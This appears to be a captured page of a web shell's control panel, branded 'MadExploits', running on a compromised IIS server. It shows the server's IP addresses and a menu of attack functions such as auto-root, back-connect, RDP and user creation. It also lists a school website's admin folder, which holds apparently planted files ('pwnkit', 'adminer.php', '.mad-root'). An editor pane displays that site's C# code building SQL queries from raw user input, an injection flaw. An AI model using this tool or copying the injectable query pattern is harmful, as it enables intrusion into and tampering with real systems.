Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
Bin
[ DIR ]
drwxrwxrwx
Images
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
scss
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
AddMedia.aspx
349
B
-rw-rw-rw-
AddMedia.aspx.cs
286
B
-rw-rw-rw-
Addblog.aspx
344
B
-rw-rw-rw-
Addblog.aspx.cs
285
B
-rw-rw-rw-
Addvideo.aspx
349
B
-rw-rw-rw-
Addvideo.aspx.cs
286
B
-rw-rw-rw-
Admin.master
14.4
KB
-rw-rw-rw-
Admin.master.cs
291
B
-rw-rw-rw-
Admin_Login - Copy.aspx
4.84
KB
-rw-rw-rw-
Admin_Login.aspx
4.84
KB
-rw-rw-rw-
Admin_Login.aspx.cs
1.5
KB
-rw-rw-rw-
DashboadMain.aspx
3.13
KB
-rw-rw-rw-
DashboadMain.aspx.cs
290
B
-rw-rw-rw-
Dashboard.aspx
16.1
KB
-rw-rw-rw-
Dashboard.aspx.cs
7.9
KB
-rw-rw-rw-
Events.aspx
8.94
KB
-rw-rw-rw-
Events.aspx.cs
4.34
KB
-rw-rw-rw-
Examination.aspx
7.83
KB
-rw-rw-rw-
Examination.aspx.cs
5.45
KB
-rw-rw-rw-
Gallery.aspx
6.5
KB
-rw-rw-rw-
Gallery.aspx.cs
4.5
KB
-rw-rw-rw-
Interhousecompetition.aspx
10
KB
-rw-rw-rw-
Interhousecompetition.aspx.cs
5.15
KB
-rw-rw-rw-
Life_Insurance.png
111.09
KB
-rw-rw-rw-
Newupdate.aspx
6.26
KB
-rw-rw-rw-
Newupdate.aspx.cs
4.2
KB
-rw-rw-rw-
Photo-gallery.aspx
5.36
KB
-rw-rw-rw-
Photo-gallery.aspx.cs
2.35
KB
-rw-rw-rw-
Show-contact-data.aspx
2.85
KB
-rw-rw-rw-
Show-contact-data.aspx.cs
871
B
-rw-rw-rw-
Showallgallery.aspx
5.15
KB
-rw-rw-rw-
Showallgallery.aspx.cs
5.31
KB
-rw-rw-rw-
SpecialMoments.aspx
7.15
KB
-rw-rw-rw-
SpecialMoments.aspx.cs
5.3
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
alumni_data.aspx
7.41
KB
-rw-rw-rw-
alumni_data.aspx.cs
4.62
KB
-rw-rw-rw-
career.aspx
39.47
KB
-rw-rw-rw-
career.aspx.cs
6.3
KB
-rw-rw-rw-
career_form_data.aspx
6.4
KB
-rw-rw-rw-
career_form_data.aspx.cs
868
B
-rw-rw-rw-
contact.aspx
347
B
-rw-rw-rw-
contact.aspx.cs
285
B
-rw-rw-rw-
download.aspx
15.01
KB
-rw-rw-rw-
download.aspx.cs
5.38
KB
-rw-rw-rw-
edit-gallery.aspx
4.51
KB
-rw-rw-rw-
edit-gallery.aspx.cs
1.32
KB
-rw-rw-rw-
profilemain.aspx
7.6
KB
-rw-rw-rw-
profilemain.aspx.cs
5.58
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Events.aspx.cs
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.IO; using System.Data; using System.Data.SqlClient; using System.Configuration; using System.Web.Configuration; using System.Drawing; public partial class Admin_Events : System.Web.UI.Page { //static string dbstring = ConfigurationManager.ConnectionStrings["myconnection"].ConnectionString; dbconnection con = new dbconnection(); SqlConnection conn = new SqlConnection(WebConfigurationManager.ConnectionStrings["myconnection"].ConnectionString); protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { Bind(); } } private void Bind() { SqlCommand cmd = new SqlCommand("select * from Events", conn); SqlDataAdapter da = new SqlDataAdapter(cmd); DataSet ds = new DataSet(); da.Fill(ds, "Events"); gv1.DataSource = ds; gv1.DataBind(); } protected void btnSaveFile_Click(object sender, EventArgs e) { using (conn) { string Competition = title.Text; conn.Open(); SqlTransaction sqlTran = conn.BeginTransaction(); SqlCommand cmd = conn.CreateCommand(); cmd.Transaction = sqlTran; try { cmd.CommandText = @"Insert Into Events(Title) Values ('" + Competition + "')"; cmd.ExecuteNonQuery(); sqlTran.Commit(); lt_msg.Text = RishiMathod.Successmsg("Title Description Added Successfully !"); Response.Redirect("Events.aspx"); } catch (Exception ex) { lt_msg.Text = RishiMathod.Errormsg(ex.Message); try { sqlTran.Rollback(); } catch (Exception exRollback) { lt_msg.Text = RishiMathod.Errormsg(exRollback.Message); } } } } protected void gv1_RowEditing(object sender, GridViewEditEventArgs e) { gv1.EditIndex = e.NewEditIndex; Bind(); } protected void gv1_RowUpdating(object sender, GridViewUpdateEventArgs e) { int index = e.RowIndex; GridViewRow row = (GridViewRow)gv1.Rows[index]; Label eid = (Label)row.FindControl("lbleid"); TextBox name = (TextBox)row.FindControl("inputDate"); //FileUpload fu = (FileUpload)row.FindControl("fu1"); //if (fu.HasFile) //{ // string file = System.IO.Path.Combine(Server.MapPath("Images/Photo/"), fu.FileName); // fu.SaveAs(file); // SqlCommand cmd = new SqlCommand("update Events set Photo = '" + fu.FileName + "' where id=" + Convert.ToInt32(eid.Text) + "", conn); // conn.Open(); // int res2 = cmd.ExecuteNonQuery(); // conn.Close(); //} SqlCommand cmd1 = new SqlCommand("update Events set Title = '" + name.Text + "' where id=" + Convert.ToInt32(eid.Text) + "", conn); conn.Open(); int res1 = cmd1.ExecuteNonQuery(); conn.Close(); if (res1 == 1) { Response.Write("<script>alert('Updation done!')</script>"); } gv1.EditIndex = -1; Bind(); } protected void gv1_RowCancelingEdit(object sender, GridViewCancelEditEventArgs e) { gv1.EditIndex = -1; Bind(); } protected void gv1_RowDeleting(object sender, GridViewDeleteEventArgs e) { int index = e.RowIndex; GridViewRow row = (GridViewRow)gv1.Rows[index]; Label eid = (Label)row.FindControl("lbleid"); SqlCommand cmd = new SqlCommand("delete from Events where id=" + Convert.ToInt32(eid.Text) + "", conn); conn.Open(); int res = cmd.ExecuteNonQuery(); conn.Close(); if (res == 1) { Response.Write("<script>alert('Deletion done!')</script>"); } Bind(); } protected void gv1_PageIndexChanging(object sender, GridViewPageEventArgs e) { gv1.PageIndex = e.NewPageIndex; Bind(); } }
Close